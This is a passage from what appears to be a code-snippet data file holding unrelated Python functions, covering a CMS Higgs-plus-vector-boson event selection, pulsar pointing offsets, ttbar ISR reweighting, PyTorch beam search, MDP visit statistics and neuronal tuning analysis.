= False\n for loose_muons_tlv in loose_muons_tlv_list:\n if loose_muons_tlv.DeltaR(jet_tlv) < 0.4:\n cleanJet = False\n if cleanJet and getJetID(self.year,event,ijet):\n if len(fatjet_tlv_list) > 0 and fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:\n jet_tlv_list.append(jet_tlv)\n idx_jet.append(ijet)\n\n ############ AK4 Jet check for VBF ###########\n if self.isZtoMM:\n lep1_tlv = mu1_tlv\n lep2_tlv = mu2_tlv\n if self.isZtoEE:\n lep1_tlv = el1_tlv\n lep2_tlv = el2_tlv\n \n for ijet in range(event.nJet):\n jet_pt = event.Jet_pt[ijet]\n jet_eta = event.Jet_eta[ijet]\n jet_phi = event.Jet_phi[ijet]\n jet_mass = event.Jet_mass[ijet]\n jet_tlv = ROOT.TLorentzVector()\n jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)\n if abs(jet_eta) < 5.0:\n if len(fatjet_tlv_list) > 0:\n if fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv) > 1.2:\n if getJetID(self.year,event,ijet) and event.Jet_puId[ijet]==7:\n if self.isZtoMM or self.isZtoEE:\n if jet_tlv.DeltaR(lep1_tlv)>0.4 and jet_tlv.DeltaR(lep2_tlv)>0.4:\n jet_tlv_list_vbf.append(jet_tlv)\n idx_jet_vbf.append(ijet) \n elif self.isZtoNN:\n jet_tlv_list_vbf.append(jet_tlv)\n idx_jet_vbf.append(ijet) \n\n idx1_vbf = -1\n idx2_vbf = -1\n maxVBFmass = -1.\n for ijet1, jet1_tlv in enumerate(jet_tlv_list_vbf):\n for ijet2, jet2_tlv in enumerate(jet_tlv_list_vbf):\n if ijet1 == ijet2: continue\n eta1 = jet_tlv_list_vbf[ijet1].Eta()\n eta2 = jet_tlv_list_vbf[ijet2].Eta()\n V_VBF = jet_tlv_list_vbf[ijet1]+jet_tlv_list_vbf[ijet2]\n VBFmass = V_VBF.M()\n if abs(eta1-eta2)>4.0 and eta1*eta2<0. and VBFmass>maxVBFmass:\n idx1_vbf = ijet1\n idx2_vbf = ijet2\n maxVBFmass = VBFmass\n \n\n self.dijet_VBF_mass = maxVBFmass\n if maxVBFmass > 500.: \n self.isVBF = True\n self.Jet1_VBF_pt = jet_tlv_list_vbf[idx1_vbf].Pt()\n self.Jet1_VBF_eta = jet_tlv_list_vbf[idx1_vbf].Eta()\n self.Jet1_VBF_phi = jet_tlv_list_vbf[idx1_vbf].Phi()\n self.Jet1_VBF_mass = jet_tlv_list_vbf[idx1_vbf].M()\n self.Jet2_VBF_pt = jet_tlv_list_vbf[idx2_vbf].Pt()\n self.Jet2_VBF_eta = jet_tlv_list_vbf[idx2_vbf].Eta()\n self.Jet2_VBF_phi = jet_tlv_list_vbf[idx2_vbf].Phi()\n self.Jet2_VBF_mass = jet_tlv_list_vbf[idx2_vbf].M()\n self.deltaR_VBF = jet_tlv_list_vbf[idx1_vbf].DeltaR(jet_tlv_list_vbf[idx2_vbf])\n self.deltaR_HVBFjet1 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx1_vbf]))\n self.deltaR_HVBFjet2 = (fatjet_tlv_list[fatjet_idx_H].DeltaR(jet_tlv_list_vbf[idx2_vbf]))\n\n ########## Higgs ######## \n H = fatjet_tlv_list[fatjet_idx_H]\n\n if self.runJEC:\n self.H_mass_nom = event.FatJet_msoftdrop_nom[fatjet_idx_H]\n self.H_mass_jmsUp = event.FatJet_msoftdrop_jmsUp[fatjet_idx_H]\n self.H_mass_jmsDown = event.FatJet_msoftdrop_jmsDown[fatjet_idx_H]\n self.H_mass_jmrUp = event.FatJet_msoftdrop_jmrUp[fatjet_idx_H]\n self.H_mass_jmrDown = event.FatJet_msoftdrop_jmrDown[fatjet_idx_H]\n self.H_pt_nom = event.FatJet_pt_nom[fatjet_idx_H]\n self.H_pt_jesUp = event.FatJet_pt_jesTotalUp[fatjet_idx_H]\n self.H_pt_jesDown = event.FatJet_pt_jesTotalDown[fatjet_idx_H]\n self.H_pt_jerUp = event.FatJet_pt_jerUp[fatjet_idx_H]\n self.H_pt_jerDown = event.FatJet_pt_jerDown[fatjet_idx_H]\n self.PuppiMET_pt_nom = event.PuppiMET_pt_nom\n self.PuppiMET_pt_jesUp = event.PuppiMET_pt_jesTotalUp\n self.PuppiMET_pt_jesDown = event.PuppiMET_pt_jesTotalDown\n self.PuppiMET_pt_jerUp = event.PuppiMET_pt_jerUp\n self.PuppiMET_pt_jerDown = event.PuppiMET_pt_jerDown\n \n H_Eta = H.Eta()\n H_Phi = H.Phi()\n H_M = H.M()\n H_nom = ROOT.TLorentzVector()\n H_jesUp = ROOT.TLorentzVector()\n H_jesDown = ROOT.TLorentzVector()\n H_jerUp = ROOT.TLorentzVector()\n H_jerDown = ROOT.TLorentzVector()\n H_nom.SetPtEtaPhiM(self.H_pt_nom,H_Eta,H_Phi,H_M)\n H_jesUp.SetPtEtaPhiM(self.H_pt_jesUp,H_Eta,H_Phi,H_M)\n H_jesDown.SetPtEtaPhiM(self.H_pt_jesDown,H_Eta,H_Phi,H_M)\n H_jerUp.SetPtEtaPhiM(self.H_pt_jerUp,H_Eta,H_Phi,H_M)\n H_jerDown.SetPtEtaPhiM(self.H_pt_jerDown,H_Eta,H_Phi,H_M)\n MET_nom = ROOT.TLorentzVector()\n MET_jesUp = ROOT.TLorentzVector()\n MET_jesDown = ROOT.TLorentzVector()\n MET_jerUp = ROOT.TLorentzVector()\n MET_jerDown = ROOT.TLorentzVector()\n MET_nom.SetPtEtaPhiM(self.PuppiMET_pt_nom,0.,event.PuppiMET_phi,self.PuppiMET_pt_nom)\n MET_jesUp.SetPtEtaPhiM(self.PuppiMET_pt_jesUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesUp)\n MET_jesDown.SetPtEtaPhiM(self.PuppiMET_pt_jesDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jesDown)\n MET_jerUp.SetPtEtaPhiM(self.PuppiMET_pt_jerUp,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerUp)\n MET_jerDown.SetPtEtaPhiM(self.PuppiMET_pt_jerDown,0.,event.PuppiMET_phi,self.PuppiMET_pt_jerDown)\n\n for ifatjet in idx_fatjet:\n if event.FatJet_btagHbb[ifatjet] > 0.3:\n self.isBoosted4B = True\n\n \n self.nJetsNoFatJet = len(jet_tlv_list)\n \n if self.isZtoNN:\n self.DPhi = abs(MET_tlv.DeltaPhi(H))\n else:\n self.DPhi = abs(V.DeltaPhi(H))\n \n self.VH_deltaR = H.DeltaR(V)\n \n jet_list_temp = []\n for ijet in range(event.nJet):\n jet_pt = event.Jet_pt[ijet]\n jet_eta = event.Jet_eta[ijet]\n jet_phi = event.Jet_phi[ijet]\n jet_mass = event.Jet_mass[ijet]\n jet_tlv = ROOT.TLorentzVector()\n jet_tlv.SetPtEtaPhiM(jet_pt,jet_eta,jet_phi,jet_mass)\n if jet_tlv.DeltaR(H) < 0.8:\n jet_list_temp.append(ijet)\n if len(jet_list_temp) == 1:\n idx = jet_list_temp[0]\n self.H_chf = event.Jet_chHEF[idx]\n self.H_nhf = event.Jet_neHEF[idx]\n elif len(jet_list_temp) == 2:\n idx1 = jet_list_temp[0]\n idx2 = jet_list_temp[1]\n pt1 = event.Jet_pt[idx1]\n pt2 = event.Jet_pt[idx2]\n chf1 = event.Jet_chHEF[idx1]\n chf2 = event.Jet_chHEF[idx2]\n nhf1 = event.Jet_neHEF[idx1]\n nhf2 = event.Jet_neHEF[idx2]\n self.H_chf = (chf1*pt1+chf2*pt2)/(pt1+pt2) \n self.H_nhf = (nhf1*pt1+nhf2*pt2)/(pt1+pt2)\n elif len(jet_list_temp) == 3:\n idx1 = jet_list_temp[0]\n idx2 = jet_list_temp[1]\n idx3 = jet_list_temp[2]\n pt1 = event.Jet_pt[idx1]\n pt2 = event.Jet_pt[idx2]\n pt3 = event.Jet_pt[idx3]\n chf1 = event.Jet_chHEF[idx1]\n chf2 = event.Jet_chHEF[idx2]\n chf3 = event.Jet_chHEF[idx3]\n nhf1 = event.Jet_neHEF[idx1]\n nhf2 = event.Jet_neHEF[idx2]\n nhf3 = event.Jet_neHEF[idx3]\n self.H_chf = (chf1*pt1+chf2*pt2+chf3*pt3)/(pt1+pt2+pt3) \n self.H_nhf = (nhf1*pt1+nhf2*pt2+nhf3*pt3)/(pt1+pt2+pt3)\n\n\n\n for jet_tlv in jet_tlv_list:\n if abs(MET_tlv.DeltaPhi(jet_tlv)) < self.MinJetMetDPhi:\n self.MinJetMetDPhi = abs(MET_tlv.DeltaPhi(jet_tlv))\n\n\n for ijet in idx_jet:\n if event.Jet_btagDeepB[ijet] > self.MaxJetNoFatJetBTag:\n self.MaxJetNoFatJetBTag = event.Jet_btagDeepB[ijet]\n\n if not self.isData:\n for igenjet in range(event.nGenJetAK8):\n genjetAK8_tlv = ROOT.TLorentzVector()\n genjetAK8_tlv.SetPtEtaPhiM(event.GenJetAK8_pt[igenjet], event.GenJetAK8_eta[igenjet], event.GenJetAK8_phi[igenjet], event.GenJetAK8_mass[igenjet])\n if H.DeltaR(genjetAK8_tlv) < 0.8:\n self.H_hadronflavour = struct.unpack('B',event.GenJetAK8_hadronFlavour[igenjet])[0]\n self.H_partonflavour = event.GenJetAK8_partonFlavour[igenjet]\n self.btagToolAK4_deep.fillEfficiencies(event,idx_jet,fatjet_idx_H)\n self.BTagAK4Weight_deep = self.btagToolAK4_deep.getWeight(event,idx_jet,fatjet_idx_H)\n self.BTagAK4Weight_deep_up = self.btagToolAK4_deep_up.getWeight(event,idx_jet,fatjet_idx_H)\n self.BTagAK4Weight_deep_down = self.btagToolAK4_deep_down.getWeight(event,idx_jet,fatjet_idx_H)\n #search for AK4 jets which match with the subjets from the H\n ak4_subjets = []\n subjet1 = TLorentzVector()\n subjet2 = TLorentzVector()\n subjet1_idx = event.FatJet_subJetIdx1[fatjet_idx_H]\n subjet2_idx = event.FatJet_subJetIdx2[fatjet_idx_H]\n if subjet1_idx>=0. and subjet2_idx>=0.:\n subjet1.SetPtEtaPhiM(event.SubJet_pt[subjet1_idx],event.SubJet_eta[subjet1_idx],event.SubJet_phi[subjet1_idx],event.SubJet_mass[subjet1_idx])\n subjet2.SetPtEtaPhiM(event.SubJet_pt[subjet2_idx],event.SubJet_eta[subjet2_idx],event.SubJet_phi[subjet2_idx],event.SubJet_mass[subjet2_idx])\n for jetid in range(event.nJet):\n ak4jet = TLorentzVector()\n ak4jet.SetPtEtaPhiM(event.Jet_pt[jetid],event.Jet_eta[jetid],event.Jet_phi[jetid],event.Jet_mass[jetid])\n if ak4jet.DeltaR(subjet1)<0.4:\n ak4_subjets.append(jetid)\n if ak4jet.DeltaR(subjet2)<0.4:\n ak4_subjets.append(jetid)\n self.btagToolAK8_deep.fillEfficiencies(event,ak4_subjets,fatjet_idx_H)\n self.BTagAK8Weight_deep = self.btagToolAK8_deep.getWeight(event,ak4_subjets,fatjet_idx_H)\n self.BTagAK8Weight_deep_up = self.btagToolAK8_deep_up.getWeight(event,ak4_subjets,fatjet_idx_H)\n self.BTagAK8Weight_deep_down = self.btagToolAK8_deep_down.getWeight(event,ak4_subjets,fatjet_idx_H)\n ########### X and variables ############\n X = V + H\n if self.isZtoNN:\n X_chs = V_chs + H\n self.X_mass_chs = X_chs.M()\n\n if self.runJEC:\n X_nom = V + H_nom\n X_jesUp = V + H_jesUp\n X_jesDown = V + H_jesDown\n X_jerUp = V + H_jerUp\n X_jerDown = V + H_jerDown\n X_MET_nom = MET_nom + H_nom\n X_MET_jesUp = MET_jesUp + H_jesUp\n X_MET_jesDown = MET_jesDown + H_jesDown\n X_MET_jerUp = MET_jerUp + H_jerUp\n X_MET_jerDown = MET_jerDown + H_jerDown\n self.X_mass_nom = X_nom.M()\n self.X_mass_jesUp = X_jesUp.M()\n self.X_mass_jesDown = X_jesDown.M()\n self.X_mass_jerUp = X_jerUp.M()\n self.X_mass_jerDown = X_jerDown.M()\n self.X_mass_MET_nom = X_MET_nom.M()\n self.X_mass_MET_jesUp = X_MET_jesUp.M()\n self.X_mass_MET_jesDown = X_MET_jesDown.M()\n self.X_mass_MET_jerUp = X_MET_jerUp.M()\n self.X_mass_MET_jerDown = X_MET_jerDown.M()\n\n self.V_pt = V.Pt()\n self.V_eta = V.Eta()\n self.V_phi = V.Phi()\n self.V_mass = V.M()\n \n if self.isZtoNN:\n self.V_mass = 0.\n\n self.H_pt = H.Pt()\n self.H_eta = H.Eta()\n self.H_phi = H.Phi()\n self.H_M = H.M()\n self.H_mass = event.FatJet_msoftdrop[fatjet_idx_H]\n self.X_pt = X.Pt()\n self.X_eta = X.Eta()\n self.X_phi = X.Phi()\n self.X_mass = X.M()\n\n\n self.H_dbt = event.FatJet_btagHbb[fatjet_idx_H]\n self.BtagDeepB = event.FatJet_btagDeepB[fatjet_idx_H]\n self.DeepTagMD_H4qvsQCD = event.FatJet_deepTagMD_H4qvsQCD[fatjet_idx_H]\n self.DeepTagMD_HbbvsQCD = event.FatJet_deepTagMD_HbbvsQCD[fatjet_idx_H]\n self.DeepTagMD_ZHbbvsQCD = event.FatJet_deepTagMD_ZHbbvsQCD[fatjet_idx_H]\n self.DeepTagMD_ZbbvsQCD = event.FatJet_deepTagMD_ZbbvsQCD[fatjet_idx_H]\n self.DeepTagMD_bbvsLight = event.FatJet_deepTagMD_bbvsLight[fatjet_idx_H]\n self.DeepTagMD_WvsQCD = event.FatJet_deepTagMD_WvsQCD[fatjet_idx_H]\n self.DeepTagMD_ZvsQCD = event.FatJet_deepTagMD_ZvsQCD[fatjet_idx_H]\n self.H_tau21 = fatjet_tau21_list[fatjet_idx_H]\n self.H_tau41 = fatjet_tau41_list[fatjet_idx_H]\n self.H_tau42 = fatjet_tau42_list[fatjet_idx_H]\n self.H_tau31 = fatjet_tau31_list[fatjet_idx_H]\n self.H_tau32 = fatjet_tau32_list[fatjet_idx_H]\n self.VHDEta = abs(V.Eta() - H.Eta())\n\n \n \n if event.FatJet_subJetIdx1[fatjet_idx_H] >= 0:\n Hcsv1 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx1[fatjet_idx_H]]\n Hdeepcsv1 = event.SubJet_btagDeepB[event.FatJet_subJetIdx1[fatjet_idx_H]]\n else:\n Hcsv1 = -1.\n Hdeepcsv1 = -1.\n if event.FatJet_subJetIdx2[fatjet_idx_H] >= 0:\n Hcsv2 = event.SubJet_btagCSVV2[event.FatJet_subJetIdx2[fatjet_idx_H]]\n Hdeepcsv2 = event.SubJet_btagDeepB[event.FatJet_subJetIdx2[fatjet_idx_H]]\n else:\n Hcsv2 = -1.\n Hdeepcsv2 = -1.\n \n self.H_csv1 = max(Hcsv1,Hcsv2)\n self.H_csv2 = min(Hcsv1,Hcsv2)\n self.H_deepcsv1 = max(Hdeepcsv1,Hdeepcsv2)\n self.H_deepcsv2 = min(Hdeepcsv1,Hdeepcsv2)\n\n\n if self.year == 2016:\n wp_loose = 0.2217\n wp_medium = 0.6321\n wp_tight = 0.8953\n elif self.year == 2017:\n wp_loose = 0.1522\n wp_medium = 0.4941\n wp_tight = 0.8001\n elif self.year == 2018:\n wp_loose = 0.1241\n wp_medium = 0.4184\n wp_tight = 0.7527\n\n if self.H_deepcsv2 > wp_loose:\n self.isHtobb = True\n if self.H_deepcsv1 > wp_medium and self.H_deepcsv2 > wp_loose:\n self.isHtobb_ml = True\n\n if self.MaxJetNoFatJetBTag > wp_loose:\n self.isMaxBTag_loose = True\n if self.MaxJetNoFatJetBTag > wp_medium:\n self.isMaxBTag_medium = True\n if self.MaxJetNoFatJetBTag > wp_tight:\n self.isMaxBTag_tight = True\n\n \n if self.H_mass != 0.:\n self.H_ddt = self.H_tau21 + 0.082 *np.log(self.H_mass*self.H_mass/self.H_pt)\n else:\n self.H_ddt = -1.\n \n self.X_tmass = np.sqrt(2.*V.Pt()*fatjet_tlv_list[fatjet_idx_H].Pt()*(1.-np.cos(fatjet_tlv_list[fatjet_idx_H].DeltaPhi(V))))\n if self.isZtoNN:\n self.X_mass = self.X_tmass\n else:\n self.X_mass = X.M()\n if self.X_mass > 750 and self.VH_deltaR > 2:\n if self.MinJetMetDPhi>0.5 and self.DPhi>2:\n for i,weight in enumerate(nncutflow_list):\n self.out.nncutflow_inc.Fill(i,weight)\n if self.VHDEta<1.3:\n for i,weight in enumerate(eecutflow_list):\n self.out.eecutflow_inc.Fill(i,weight)\n for i,weight in enumerate(mmcutflow_list):\n self.out.mmcutflow_inc.Fill(i,weight)\n \n if self.isZtoEE or self.isZtoMM or self.isZtoNN or self.isTtoEM:\n self.fillBranches(event)\n return True", "def inPointing(self, pulsar):\n # initialise offset_deg to be a big old number\n # FWHM is in arcmin so always multiply by 60\n offset_deg = 5.\n\n # loop over pointings\n for point in self.pointingslist:\n # do a really basic check first\n\n glterm = (pulsar.gl - point.gl)**2\n gbterm = (pulsar.gb - point.gb)**2\n offset_new = math.sqrt(glterm + gbterm)\n\n # if the beam is close enough, break out of the loop\n if offset_new < offset_deg:\n offset_deg = offset_new\n self.gain = point.gain\n self.tobs = point.tobs\n \n return offset_deg", "def analyze(self, event):\n\t\tJets = Collection(event, \"Jet\")\n\t\tjets = [j for j in Jets if j.pt >= 20]\n\t\tgenpart = Collection(event, \"GenPart\")\n\t\tgenParts = [l for l in genpart]\n\t\t# get the particles when they have a mother ---> getting the daughters only \n\t\tdaughters = [l for l in genpart if l.genPartIdxMother>= 0 ]\n\t\tevent.nIsr = 0\n\t\tfor jet in jets:\n\t\t\tif jet.pt <30.0: continue\n\t\t\tif abs(jet.eta )>2.4: continue\n\t\t\tmatched = False\n\t\t\tfor i,mc in enumerate(genParts):\n\t\t\t\t# if it's matched doesn't make sence to correct it\n\t\t\t\tif matched: break\n\t\t\t\t# check if it's quark from top or not\n\t\t\t\tif (mc.status!=23 or abs(mc.pdgId)>5): continue\n\t\t\t\tmomid = abs(genParts[mc.genPartIdxMother].pdgId)\n\t\t\t\tif not (momid==6 or momid==23 or momid==24 or momid==25 or momid>1e6): continue\n\t\t\t\tfor idau in range(len(daughters)) :\n\t\t\t\t\t# look for the products of the jet and match jet with gen daughters of the quark \n\t\t\t\t\tif i == daughters[idau].genPartIdxMother:\n\t\t\t\t\t\tdR = math.sqrt(deltaR2(jet.eta,jet.phi, daughters[idau].eta,daughters[idau].phi))\n\t\t\t\t\t\tif dR<0.3:\n\t\t\t\t\t\t\t# if matched escape\n\t\t\t\t\t\t\tmatched = True\n\t\t\t\t\t\t\tbreak\n\t\t\t# if not matched correct it \n\t\t\tif not matched:\n\t\t\t\tevent.nIsr+=1\n\t\t# fill the output with nisr\n\t\tself.out.fillBranch(\"nIsr\",event.nIsr)\n\t\tnISRweight = 1\n\t\t#https://indico.cern.ch/event/592621/contributions/2398559/attachments/1383909/2105089/16-12-05_ana_manuelf_isr.pdf\n\t\tISRweights_Mar17 = { 0: 1, 1 : 0.920, 2 : 0.821, 3 : 0.715, 4 : 0.662, 5 : 0.561, 6 : 0.511}\n\t\tISRweights_ICHEP16 = { 0: 1, 1 : 0.882, 2 : 0.792, 3 : 0.702, 4 : 0.648, 5 : 0.601, 6 : 0.515}\n\t\tISRweightssyst_Mar17 = { 0: 0.0, 1 : 0.040, 2 : 0.090, 3 : 0.143, 4 : 0.169, 5 : 0.219, 6 : 0.244}\n\t\tISRweightssyst_ICHEP16 = { 0: 0.0, 1 : 0.059, 2 : 0.104, 3 : 0.149, 4 : 0.176, 5 : 0.199, 6 : 0.242}\n\t\t\n\t\tif self.ICHEP16 == True and self.Mar17 == False:\n\t\t\tISRweights = ISRweights_ICHEP16\n\t\t\tISRweightssyst = ISRweightssyst_ICHEP16\n\t\t\t\n\t\telif self.ICHEP16 == False and self.Mar17 == True: \n\t\t\tISRweights = ISRweights_Mar17\n\t\t\tISRweightssyst = ISRweightssyst_Mar17\n\t\t\t\n\t\tnISRforWeights = int(event.nIsr)\n\t\tif event.nIsr > 6:\n\t\t\tnISRforWeights = 6\n\t\tC_ISR = 1.090\n\t\tC_ISR_up = 1.043\n\t\tC_ISR_down = 1.141\n\t\tnISRweight = C_ISR * ISRweights[nISRforWeights]\n\t\tnISRweightsyst_up = C_ISR_up * (ISRweights[nISRforWeights] + ISRweightssyst[nISRforWeights])\n\t\tnISRweightsyst_down = C_ISR_down * (ISRweights[nISRforWeights] - ISRweightssyst[nISRforWeights])\n\t\t\n\t\tself.out.fillBranch(\"nISRweight\",nISRweight)\n\t\tself.out.fillBranch(\"nISRttweightsyst_up\",nISRweightsyst_up)\n\t\tself.out.fillBranch(\"nISRttweightsyst_down\",nISRweightsyst_down)\n\n\n # ------ Forwarded Message --------\n # Subject: Re: question for ttbar ISR reweighting\n # Date: Sat, 14 Jan 2017 20:24:14 +0100\n # From: Manuel Franco Sevilla <[email protected]>\n #The [Nom, Up, Down] values we find for the events with Nisr = 0 are:\n #[1.090, 1.043, 1.141]: TTJets_Tune\n #[1.096, 1.046, 1.151]: TTJets_SingleLeptFromT\n #[1.116, 1.055, 1.185]: TTJets_DiLept\n\t\t\n\t\t\n\t\treturn True", "def beam_search(\n encoder_outputs,\n init, step, update,\n length_penalty=no_length_penalty,\n **kwargs\n):\n K = kwargs.get('beam', 5)\n mxlen = kwargs.get('mxlen', 100)\n bsz = encoder_outputs.output.size(0)\n device = encoder_outputs.output.device\n with torch.no_grad():\n extra = init(encoder_outputs, K)\n paths = torch.full((bsz, K, 1), Offsets.GO, dtype=torch.long, device=device)\n # This tracks the log prob of each beam. This is distinct from score which\n # is based on the log prob and penalties.\n log_probs = torch.zeros((bsz, K), dtype=torch.float, device=device)\n # Tracks the lengths of the beams, unfinished beams have a lengths of zero.\n lengths = torch.zeros((bsz, K), dtype=torch.long, device=device)\n last = paths[:, :, -1] # [B, K]\n\n for i in range(mxlen - 1):\n probs, extra = step(paths, extra)\n V = probs.size(-1)\n probs = probs.view((bsz, K, V)) # [B, K, V]\n if i > 0:\n # This mask is for all beams that are done.\n done_mask = (lengths != 0).unsqueeze(-1) # [B, K, 1]\n # Can creating this mask be moved out of the loop? It never changes but we don't have V\n # This mask selects the EOS token\n eos_mask = torch.zeros((1, 1, V), dtype=torch.uint8, device=device)\n eos_mask[:, :, Offsets.EOS] = 1\n # This mask selects the EOS token of only the beams that are done.\n mask = done_mask & eos_mask\n # Put all probability mass on the EOS token for finished beams.\n # Otherwise as the other beams get longer they will all give\n # up and eventually select this beam and all outputs become\n # the same.\n probs = probs.masked_fill(done_mask, -np.inf)\n probs = probs.masked_fill(mask, 0)\n probs = log_probs.unsqueeze(-1) + probs # [B, K, V]\n # Calculate the score of the beam based on the current length.\n path_scores = probs / length_penalty(lengths.masked_fill(lengths==0, i+1))\n else:\n # On the first step we only look at probabilities for the first beam.\n # If we don't then the probs will be the same for each beam\n # This means the same token will be selected for each beam\n # And we won't get any diversity.\n # Using only the first beam ensures K different starting points.\n path_scores = probs[:, 0, :]\n\n flat_scores = path_scores.view(bsz, -1) # [B, K * V]\n best_scores, best_idx = flat_scores.topk(K, 1)\n # Get the log_probs of the best scoring beams\n log_probs = probs.view(bsz, -1).gather(1, best_idx).view(bsz, K)\n\n best_beams = best_idx / V # Get which beam it came from\n best_idx = best_idx % V # Get the index of the word regardless of which beam it is.\n\n # Best Beam index is relative within the batch (only [0, K)).\n # This makes the index global (e.g. best beams for the second\n # batch example is in [K, 2*K)).\n offsets = torch.arange(bsz, dtype=torch.long, device=device) * K\n offset_beams = best_beams + offsets.unsqueeze(-1)\n flat_beams = offset_beams.view(bsz * K)\n # Select the paths to extend based on the best beams\n flat_paths = paths.view(bsz * K, -1)\n new_paths = flat_paths[flat_beams, :].view(bsz, K, -1)\n # Add the selected outputs to the paths\n paths = torch.cat([new_paths, best_idx.unsqueeze(-1)], dim=2)\n\n # Select the lengths to keep tracking based on the valid beams left.\n lengths = lengths.view(-1)[flat_beams].view((bsz, K))\n\n extra = update(flat_beams, extra)\n\n # Updated lengths based on if we hit EOS\n last = paths[:, :, -1]\n eoses = (last == Offsets.EOS)\n lengths = update_lengths(lengths, eoses, i + 1)\n if (lengths != 0).all():\n break\n else:\n # This runs if the loop didn't break meaning one beam hit the max len\n # Add an EOS to anything that hasn't hit the end. This makes the scores real.\n probs, extra = step(paths, extra)\n\n V = probs.size(-1)\n probs = probs.view((bsz, K, V))\n probs = probs[:, :, Offsets.EOS] # Select the score of EOS\n # If any of the beams are done mask out the score of this EOS (they already had an EOS)\n probs = probs.masked_fill((lengths != 0), 0)\n log_probs = log_probs + probs\n end_tokens = torch.full((bsz, K, 1), Offsets.EOS, device=device, dtype=paths.dtype)\n paths = torch.cat([paths, end_tokens], dim=2)\n lengths = update_lengths(lengths, torch.ones_like(lengths) == 1, mxlen)\n best_scores = log_probs / length_penalty(lengths).squeeze(-1)\n\n # Slice off the Offsets.GO token\n paths = paths[:, :, 1:]\n return paths, lengths, best_scores", "def updateVisitStatistics(self, s, a, s_) :\n self.N[s, a, s_] += 1\n self.Ntotal[s, a] += 1\n self.PHat[s, a] = self.N[s, a] / self.Ntotal[s, a]\n self.omega[s, a] = confidenceRadius(self.mdp, self.Ntotal[s, a], self.delta_)", "def _analyse(self, source='sdf', alpha = 0.05, n_bootstrap = 2000, \n\t\tbiphase_split_point = 0.5, biphase_select_resp = None):\n\t\t\n\t\t\n\t\t# Need to add capacity to handle two things:\n\t\t# Qualitative conditions ne\n\t\t# Conditions split - need to to deal with splitting a single dataset, where one part\n\t\t# is qualitiative and the other quantitative\n\t\t\n\t\t# For qualitative, the self.cond_tuning array is numerical. Replace with record\n\t\t# see Initial Chrom Analysis. Keep conditions as strings, and convert to numerical\n\t\t# for plotting (?). Where qualitative, only use bar plot, where mixed, split.\n\t\t## Add parameters to parameters dictionary\n\n\t\tself.parameters['biphase_split_point'] = biphase_split_point\n\t\tself.parameters['biphase_select_resp'] = biphase_select_resp\n\t\t\n\t\t# Organising source selection - raw and mov_avg not develoepd fully yet.\n\t\tsources = {'sdf': (self.spike_dens_func, self.CI_pos, self.CI_neg), \n\t\t\t\t 'mov_avg': 'doesnt exist yet, call it self.spike_mov_avg', \n\t\t\t\t 'raw': (self.conditions_hist_mean, \n\t\t\t\t\t\t self.conditions_hist_mean + 2*self.conditions_hist_stderr, \n\t\t\t\t\t\t self.conditions_hist_mean - 2*self.conditions_hist_stderr)}\n\t\t\t\t \n\t\tassert source.lower() in sources.keys(), ('Tuning source data \"%s\" is invalid '\n\t\t\t\t\t\t\t\t\t\t\t\t\t'select one of %s' %(source, sources.keys())) \n\t \n\t\t## Need to expand this functionality to the mean and CI_pos and CI_neg. Doing so for\n\t # raw and moving average is not a priority, using sdf and bootstrap is pretty good.\n\t # overall aim is to clean this function up to accomadte a number of tuning functinos\n\t # in a clear and easy to use fasion.\n\t \n\t\tn_con = self.parameters['conditions']\n\t\t\n\t\t# values for transient bar responses\n\t\tif self.parameters['stimulus'] == 'bar':\n\t\t\t\n\t\t\tresp, CI_pos, CI_neg = sources[source.lower()]\n\t\t\t\n\t\t\t\n\t\t\tif self.parameters['biphasic']:\n\t\t\t\t\n\t\t\t\t# Take max response for each half of each PSTH, including Conf Intvls\n\t\t\t\thalf = int(self.bins.size * biphase_split_point)\n\n\t\t\t\tmax_val_arg = (resp[:, :half].argmax(axis=1),\n\t\t\t\t\t\t\t resp[:, half:].argmax(axis=1)+half)\n\t\t\t\t\t\t\t\t\t\n\t\t\t\tmax_val = (resp[:, :half].max(axis=1),\n\t\t\t\t\t\t resp[:, half:].max(axis=1))\n\t\t\t\t\t\t \n\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_neg = (CI_neg[np.arange(n_con), max_val_arg[0]],\n\t\t\t\t\t\t\t\t CI_neg[np.arange(n_con), max_val_arg[1]])\n\t\t\t\t\t\t\t\t \n\t\t\t\tmax_val_CI_pos = (CI_pos[np.arange(n_con), max_val_arg[0]],\n\t\t\t\t\t\t\t\t CI_pos[np.arange(n_con), max_val_arg[1]])\n\n\t\t\t\t# encode which of the two responses the data is attached to\n\t\t\t\tbiphas_id = np.zeros_like(np.hstack((self.conditions, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.conditions2)))\n\t\t\t\tbiphas_id[:self.conditions.size] = 1\n\t\t\t\tbiphas_id[self.conditions2.size:] = 2\n\n\n\t\t\t\t\t\t\t\t \n\t\t\t\tself.cond_tuning = np.vstack((np.hstack((self.conditions, \n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.conditions2)),\n\t\t\t\t\t\t\t\t\t\t\t np.hstack(max_val),\n\t\t\t\t\t\t\t\t\t\t\t np.hstack(max_val_CI_neg),\n\t\t\t\t\t\t\t\t\t\t\t np.hstack(max_val_CI_pos),\n\t\t\t\t\t\t\t\t\t\t\t biphas_id))\n\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t# Convert to Hertz - design choice is to keep all PSTH datasets as raw average spike\n\t\t\t\t# counts, with easy option of seeing frequency in the plotting, but converting to \n\t\t\t\t# Hertz for all condition tuning data.\n\t\t\t\tself.cond_tuning[1:-1,:] *= (1/self.bin_width)\n\t\t\t\t\t\t\t\t\t\t\t \n\t\t\t\t\t\t\t \n\t\t\t\t# Column labels for pd.dataframe of tuning data\n\t\t\t\t# Percentage of confidence intervals\n\t\t\t\t# ci_perc = (100 * (1 - self.parameters['sdf_alpha']))\n\t\t\t\t\n\t\t\t\t# Labels\n\t\t\t\tidx = ['condition', 'max_resp', 'neg_CI', 'pos_CI', 'biphas_id']\n\t\t\t\t\n\t\t\t\t# Pandas object, with transpose of tuning array to data frame object \n\t\t\t\tself.cond_tuning_pd = pd.DataFrame(self.cond_tuning.transpose(), 